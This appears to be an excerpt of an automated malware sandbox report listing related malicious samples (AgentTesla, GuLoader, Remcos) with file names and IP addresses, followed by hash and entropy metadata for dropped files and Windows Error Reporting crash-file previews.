| | Quotation.exe | malicious | AgentTesla, GuLoader | 99.83.170.3, 188.114.96.3 |
| | Request for Quotation 11-11-2024#U00b7pdf.vbs | malicious | Remcos, GuLoader | 99.83.170.3, 188.114.96.3 |
| | 074c592b-5cc0-496d-b3fa-45a09d4363ce#U00b7pdf.vbs | malicious | Remcos, GuLoader | 99.83.170.3, 188.114.96.3 |
| | rPO3799039985.exe | malicious | Remcos, GuLoader | 99.83.170.3, 188.114.96.3 |
                                                                                                                                                                                                            No context
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):593
                                                                                                                                                                                                            Entropy (8bit):7.626935561277827
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:NXnYWSLEmM3e7/EzZUimtdHCD6B+HAwQ0m7xs01O58/fTU6i0rSZd09LQ:FYWSLdM3CENUJtd85IsWO58NGd09k
                                                                                                                                                                                                            MD5:926512864979BC27CF187F1DE3F57AFF
                                                                                                                                                                                                            SHA1:ACDEB9D6187932613C7FA08EAF28F0CD8116F4B5
                                                                                                                                                                                                            SHA-256:B3E893A653EC06C05EE90F2F6E98CC052A92F6616D7CCA8C416420E178DCC73F
                                                                                                                                                                                                            SHA-512:F6F9FD3CA9305BEC879CFCD38E64111A18E65E30D25C49E9F2CD546CBAB9B2DCD03ECA81952F6B77C0EAAB20192EF7BEF0D8D434F6F371811929E75F8620633B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):43438
                                                                                                                                                                                                            Entropy (8bit):7.990138823807318
                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                            SSDEEP:768:A6eLDU7W3WFK7FdCDxeqiLQf3UmXYoxwHoLB019/avO5Y8ZfJtPYo37b1SG/Qw9:AD33bBMDxehg3Hx44e1ZavODAGRN/j
                                                                                                                                                                                                            MD5:667D4C31668E9D495B8066E696FE77DC
                                                                                                                                                                                                            SHA1:AFBBE4C5D77A504827FB5D976D7D0A8F7A151382
                                                                                                                                                                                                            SHA-256:5FEA80C0353FF42DE2F6EDEC4CA00CF80B012B9B9A3760EAA5540B4C4A2BEC2F
                                                                                                                                                                                                            SHA-512:93A826C8F5745E59ACA0C0F890FC34EDDB54602A070D89D80A889406780A1A468F92EFCF3534FD0FB29AC22B123F517F8351AB8211BDDA8739F9709280BC2EF4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):114
                                                                                                                                                                                                            Entropy (8bit):6.479691220248167
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:elfPZkATGqaNh/bf4/o/flD2qNJ5ZmANv:elfhkVNh/L4kl2qNJ5ZmAx
                                                                                                                                                                                                            MD5:BFDE1E9E9C32C1681A16139450C6909D
                                                                                                                                                                                                            SHA1:7E669B927E6A75A10A0CA29E38E58DDCB49B725E
                                                                                                                                                                                                            SHA-256:E0D020BA1CB6506CEE234903A44C747EE0CFA7E2D1E60029E4CD8DE9A431512A
                                                                                                                                                                                                            SHA-512:781FD54F155442DD34F9919B3CD063EE399DB411BBFE15F2BDC43D3AB8AC2D04E1011B2C99FAB42BEBF7B903A94E09AAAEF71B7A465D2D04B417F6DAD8E8E396
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):59521
                                                                                                                                                                                                            Entropy (8bit):7.972553484293753
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:ZQimNJq4lkHqWmHwEyivDfOoG5tN06d+1N:ZRukFmHy4rG5tUN
                                                                                                                                                                                                            MD5:7365A373028EAAA65DB162DD1ED58552
                                                                                                                                                                                                            SHA1:A2825E9438DBF853961F5B50F46686D56B873BF9
                                                                                                                                                                                                            SHA-256:6B29D2C9CA65EEDD45C86273EA34ECE6B04D5B5CFCB90F23509A5ED9EA7ECFB0
                                                                                                                                                                                                            SHA-512:68C7D894D8BCF767F2519047354CD4DA2A90BE276CEED80DCAD560CDAE6B68C630D418133CBF64D7BF2F25E3BFB501DFBAC1D87CA4C905C5ECCCBFDCC1496E84
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):114
                                                                                                                                                                                                            Entropy (8bit):6.479691220248167
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:elfPZkATGqaNh/bf4/o/flD2qNJ5ZmANv:elfhkVNh/L4kl2qNJ5ZmAx
                                                                                                                                                                                                            MD5:BFDE1E9E9C32C1681A16139450C6909D
                                                                                                                                                                                                            SHA1:7E669B927E6A75A10A0CA29E38E58DDCB49B725E
                                                                                                                                                                                                            SHA-256:E0D020BA1CB6506CEE234903A44C747EE0CFA7E2D1E60029E4CD8DE9A431512A
                                                                                                                                                                                                            SHA-512:781FD54F155442DD34F9919B3CD063EE399DB411BBFE15F2BDC43D3AB8AC2D04E1011B2C99FAB42BEBF7B903A94E09AAAEF71B7A465D2D04B417F6DAD8E8E396
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):25028
                                                                                                                                                                                                            Entropy (8bit):7.979704330440142
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:f4ak8nl3r9Htb7pEFRtxSjjWk5rSV4Z8tPzh3XCV5:AJElb9HMRtxQjWKW4S8P
                                                                                                                                                                                                            MD5:830ADF6D8C5F44C1BEDCEE9C9E97D80F
                                                                                                                                                                                                            SHA1:09291626EB3F99ED57CED05B717E47B2820842BC
                                                                                                                                                                                                            SHA-256:1339C0557393D518631E8D31BF2C8D2F29CBCB0A50B5F64B6251570FEC107281
                                                                                                                                                                                                            SHA-512:10D469D47B472D8EF3B945BFBC8E94E0471B19A2C19102D2DCAC4CF249618508AD9BF2A8E02BEBD94736804052C8E4E396DFCED20AC78674E4730813DF2AEF12
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1094
                                                                                                                                                                                                            Entropy (8bit):7.846100825403509
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:IZsdS4WMBLdxezuQj1kZ8l9KfPqiHv8jckTXRUubBZU:QsSixez1Rg8ydkTXRdBZU
                                                                                                                                                                                                            MD5:CDD419FBE9A78B58D570A9342163D049
                                                                                                                                                                                                            SHA1:F9103E5FDE55D1DFC797623FE6819E03A3348268
                                                                                                                                                                                                            SHA-256:9CCA975CF3E340C1394774C17D54DD875C0DF69EB79CE8DBF97A343614CAA180
                                                                                                                                                                                                            SHA-512:493FC46ABC8A6C34E4A233EAA3FDE6660FFB4A4CD7725392F708EE0CE1F6A70FFB89E0BE72EAE2F6EF401BC8B13440E7CD3CB41DC8DD9E3BA0609C09A4A604AD
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):65536
                                                                                                                                                                                                            Entropy (8bit):0.9657982617679941
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:dJWlTL7z83BU/ct7jPczuiF0Y4IO8Iq1:dpBU/wjPczuiF0Y4IO8
                                                                                                                                                                                                            MD5:65EA0CD894A6DE4E8888A263359670B7
                                                                                                                                                                                                            SHA1:328F9507AE487EC48E9D805335D75AC5D788153E
                                                                                                                                                                                                            SHA-256:F2E924A5FAEB36435A4D14402978EBE70D27C3E98CF212FFA33C88E8CE4E2ADA
                                                                                                                                                                                                            SHA-512:CA9DF61B632DA74EC511299FE485C8AD0A0091BD10FBD00EEDE162A0ECABAEA510EB0AB8FED998A9F35A15379F98F01A126B8C3777D5E9D112AEADDFD2DE820B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.1.8.4.9.3.8.2.0.6.1.5.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.1.8.4.9.4.7.1.1.2.5.5.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.b.8.8.6.f.1.1.-.1.b.f.b.-.4.d.6.9.-.b.0.b.b.-.5.e.6.e.4.6.9.a.d.0.d.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.f.5.c.3.1.f.c.-.b.a.a.7.-.4.8.f.4.-.a.a.1.3.-.1.5.e.a.3.7.5.7.8.7.7.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.B.y.P.j.Y.Y.b.f.x.z.a.U.l.b.c.W.o.K.U.I.r.n.l.Z.i.Y.H.b...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.a.0.-.0.0.0.1.-.0.0.1.4.-.b.a.4.9.-.b.a.3.0.5.c.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.4.0.c.2.1.3.9.0.9.3.c.c.3.5.6.d.6.d.e.0.c.3.f.b.1.2.7.4.1.b.6.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.B.y.P.j.Y.Y.b.
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                            Size (bytes):65536
                                                                                                                                                                                                            Entropy (8bit):1.026989092237025
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:lAgtle8L7l880BU/ct7jRJkfTzuiF0Z24IO8Iq1:VtlTL7l83BU/ct7jPCzuiF0Y4IO8Iq1
                                                                                                                                                                                                            MD5:26673F9286C8FFD3546AAF94312F47C6
                                                                                                                                                                                                            SHA1:9B00D1F800AEE2D7270BD66B205E1F6A6FDC3DC4
                                                                                                                                                                                                            SHA-256:AD255965F63CE9DDA320B2115C23680FDE16085042264AD000128D99CFC6017A
                                                                                                                                                                                                            SHA-512:64E3794F5C5750C88DBE8E9C0307524F173B9355E1ECCCD2109420ECC91A6073461D52F9EA4C5A0C23E8FC5E4EBE0DC3DCF52B3C90CFAF80BEFCDD38EA565109
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.1.8.5.0.2.9.2.6.5.5.4.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.1.8.5.0.5.6.1.4.0.3.6.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.f.9.8.6.c.6.7.-.4.1.e.4.-.4.2.a.e.-.b.4.1.4.-.8.8.3.c.9.5.d.1.9.c.6.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.d.9.f.3.b.7.6.-.2.e.a.0.-.4.1.f.6.-.8.0.4.8.-.1.e.f.f.5.5.6.3.a.c.5.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.B.y.P.j.Y.Y.b.f.x.z.a.U.l.b.c.W.o.K.U.I.r.n.l.Z.i.Y.H.b...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.6.d.c.-.0.0.0.1.-.0.0.1.4.-.1.8.4.2.-.a.a.3.0.5.c.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.4.0.c.2.1.3.9.0.9.3.c.c.3.5.6.d.6.d.e.0.c.3.f.b.1.2.7.4.1.b.6.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.B.y.P.j.Y.Y.b.
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):65536
                                                                                                                                                                                                            Entropy (8bit):1.027175717950961
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:LE8lTL7583BU/ct7jPKzuiF0Y4IO8Iq1:IHBU/wjPKzuiF0Y4IO8
                                                                                                                                                                                                            MD5:8FBD729F355CC0B581D5E28AAF83096C
                                                                                                                                                                                                            SHA1:3513CD7C4A9FD363E867F3ED21F8D6E61CF654A1
                                                                                                                                                                                                            SHA-256:83AC8F808E0143697E1D0B8D767E54FDD94407663207D985F2135D69839B3CE9
                                                                                                                                                                                                            SHA-512:4BBCCFF6A89519600B1965A33FBF427EF3DF9F84DD05AC02E0BEF19E33FA39C0A265CF123418BDB52C8E532890EFBD3D57EC7789D4663DE95564D14BAC3282D4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.1.8.5.0.5.0.8.9.3.8.3.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.1.8.5.0.8.0.5.8.1.4.8.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.1.b.8.5.d.b.3.-.7.8.0.c.-.4.9.8.c.-.b.b.d.c.-.7.e.c.4.1.1.3.8.6.2.a.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.a.0.7.7.c.a.6.-.f.0.6.5.-.4.4.8.9.-.8.b.9.d.-.e.f.d.2.b.4.7.3.7.a.c.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.B.y.P.j.Y.Y.b.f.x.z.a.U.l.b.c.W.o.K.U.I.r.n.l.Z.i.Y.H.b...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.7.1.4.-.0.0.0.1.-.0.0.1.4.-.0.e.4.1.-.a.7.3.0.5.c.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.4.0.c.2.1.3.9.0.9.3.c.c.3.5.6.d.6.d.e.0.c.3.f.b.1.2.7.4.1.b.6.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.B.y.P.j.Y.Y.b.
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):65536
                                                                                                                                                                                                            Entropy (8bit):1.0139283543167261
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:ovdle8L7P880BU/ct7jRJkGzuiF0Z24IO8Iq1:ydlTL7P83BU/ct7jPfzuiF0Y4IO8Iq1
                                                                                                                                                                                                            MD5:72764B6F0DD49396C52FE4DB58BC5CCA
                                                                                                                                                                                                            SHA1:017B06C1F5A34547A5ABA9BDFDDF3F2442CCF4CA
                                                                                                                                                                                                            SHA-256:5D0318ECB9467867B36A1CEC514EE885B01CE2FBDECD6DD9D5C086A503774B62
                                                                                                                                                                                                            SHA-512:189A2BC8676F5C8D6C0168E91123776966934C5318AAE6FC65A1F10157C1F09A1BC1077540060BB0B27F97CF925FA1C83A43F0E0B6CE2A97DB18A70276B11B2C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.1.8.5.0.6.7.3.5.8.4.3.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.1.8.5.0.8.8.1.3.9.7.8.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.a.3.7.3.f.2.2.-.3.1.2.3.-.4.e.2.4.-.b.a.2.a.-.8.b.f.5.6.3.1.b.3.2.b.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.e.5.3.7.a.b.b.-.6.3.f.e.-.4.4.f.c.-.9.0.3.1.-.7.4.7.b.d.5.a.a.a.f.d.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.B.y.P.j.Y.Y.b.f.x.z.a.U.l.b.c.W.o.K.U.I.r.n.l.Z.i.Y.H.b...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.7.6.c.-.0.0.0.1.-.0.0.1.4.-.6.9.f.1.-.a.5.3.0.5.c.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.4.0.c.2.1.3.9.0.9.3.c.c.3.5.6.d.6.d.e.0.c.3.f.b.1.2.7.4.1.b.6.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.B.y.P.j.Y.Y.b.
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):65536
                                                                                                                                                                                                            Entropy (8bit):1.0270445958769614
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:7ZIlTL7F83BU/ct7jPyzuiF0Y4IO8Iq1:1fBU/wjPyzuiF0Y4IO8
                                                                                                                                                                                                            MD5:93F832491D21A2624854429BA337A36E
                                                                                                                                                                                                            SHA1:3782B65D4301531CD56BE787A507272211DDBD67
                                                                                                                                                                                                            SHA-256:4E6829E17979F67428BC91035DA62231DB29916BB58E24BFE728C3C20FCFF471
                                                                                                                                                                                                            SHA-512:9B5A817018ABC33F90F4908152520732EE65082296F2D61C0DF0AEBAE48C7175934230C4CF2626093CC61D11B002B99DC2CE16E0F6D7551F6E6D06011E9538F7
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.1.8.4.9.1.8.7.1.4.7.3.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.1.8.4.9.4.2.7.7.7.3.6.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.b.b.d.1.2.1.3.-.5.8.a.b.-.4.f.6.f.-.b.f.0.2.-.1.8.5.a.4.b.4.5.2.4.2.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.0.5.2.5.d.3.c.-.3.6.d.7.-.4.1.a.6.-.b.a.e.5.-.f.f.e.c.6.7.9.4.2.b.a.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.B.y.P.j.Y.Y.b.f.x.z.a.U.l.b.c.W.o.K.U.I.r.n.l.Z.i.Y.H.b...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.a.2.c.-.0.0.0.1.-.0.0.1.4.-.c.1.8.6.-.b.c.3.0.5.c.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.4.0.c.2.1.3.9.0.9.3.c.c.3.5.6.d.6.d.e.0.c.3.f.b.1.2.7.4.1.b.6.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.B.y.P.j.Y.Y.b.
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):65536
                                                                                                                                                                                                            Entropy (8bit):1.0269623048302876
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:lx/lTL7WG83BU/ct7jPKzuiF0Y4IO8Iq1:stBU/wjPKzuiF0Y4IO8
                                                                                                                                                                                                            MD5:D497FF07C7C8E64B6964C1260277AA85
                                                                                                                                                                                                            SHA1:D6F1342311DE60AF7DDE037D5B4FB5B701353560
                                                                                                                                                                                                            SHA-256:1621E2B6520297299889BB5F7CEAFB0107835D23C7F9E4BB0DCA683096073074
                                                                                                                                                                                                            SHA-512:A5A6EEBD6D7B596CC49FFA472A90BCD448838E3A8A0CC5CD1BB8CB3899F1397BA187380C209A035909B18490FBD389DE79C2EA70DC9D02F6DB49DBF84F4F78F4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.1.8.4.9.6.6.5.9.0.8.1.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.1.8.4.9.9.1.4.3.4.6.9.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.c.4.7.a.6.f.e.-.f.0.a.6.-.4.8.0.3.-.8.9.6.4.-.6.c.4.d.a.6.1.c.d.b.b.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.c.2.6.1.c.5.6.-.4.2.e.7.-.4.3.c.f.-.9.7.1.5.-.a.f.1.c.5.f.b.e.8.a.e.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.B.y.P.j.Y.Y.b.f.x.z.a.U.l.b.c.W.o.K.U.I.r.n.l.Z.i.Y.H.b...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.2.1.4.-.0.0.0.1.-.0.0.1.4.-.6.6.8.0.-.b.8.3.0.5.c.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.4.0.c.2.1.3.9.0.9.3.c.c.3.5.6.d.6.d.e.0.c.3.f.b.1.2.7.4.1.b.6.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.B.y.P.j.Y.Y.b.
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):65536
                                                                                                                                                                                                            Entropy (8bit):1.0268527310788043
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:vryle8L72880BU/ct7jRJkfTzuiF0Z24IO8Iq1:zylTL7283BU/ct7jPCzuiF0Y4IO8Iq1
                                                                                                                                                                                                            MD5:F941228302114462734E30B4989B4F51
                                                                                                                                                                                                            SHA1:98524AB98B5BB25B233A6ABC589AB580F5ACA3C5
                                                                                                                                                                                                            SHA-256:A924D4456A6C0DB48AF1E8D06408DB459FBB33B437DCFCB96C67220347632BAF
                                                                                                                                                                                                            SHA-512:F2364EC8F5353D0B7A9A317E492FDB0F0A5130AE8879A32E2843103727A5F098560DC21ECDD085DF384A54670FE629E134EBEEA9D4FF81F55203CBE1A9EB5125
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.1.8.4.9.1.6.8.2.7.6.8.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.1.8.4.9.4.5.1.0.9.0.2.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.a.4.4.4.d.1.a.-.8.5.a.1.-.4.1.d.e.-.a.4.d.2.-.0.4.2.1.b.3.c.d.d.f.4.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.7.1.8.4.9.f.9.-.6.1.1.9.-.4.3.c.a.-.b.0.1.7.-.3.1.b.8.4.3.d.9.7.5.5.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.B.y.P.j.Y.Y.b.f.x.z.a.U.l.b.c.W.o.K.U.I.r.n.l.Z.i.Y.H.b...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.f.4.-.0.0.0.1.-.0.0.1.4.-.5.0.2.1.-.c.0.3.0.5.c.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.4.0.c.2.1.3.9.0.9.3.c.c.3.5.6.d.6.d.e.0.c.3.f.b.1.2.7.4.1.b.6.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.B.y.P.j.Y.Y.b.
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:08:12 2024, 0x1205a4 type
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):746862
                                                                                                                                                                                                            Entropy (8bit):1.6062422940744279
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:NEAIqROPB6v6jRCvhhxvEE1YyJl1x39UmEy8cURWEW3R1J74kcoEge4CvwuH/R3C:NEAIjB6ijuqyua4kcXwERG9
                                                                                                                                                                                                            MD5:6B9E1F37BC4C61EF5ACBD38B1D798E33
                                                                                                                                                                                                            SHA1:E37486BF05913D9C87B102008E7EF6B19B816263
                                                                                                                                                                                                            SHA-256:BD98AA8B5E1EA738227BF2A060E60E43662796EB147F24063DD6D94E5E6D3982
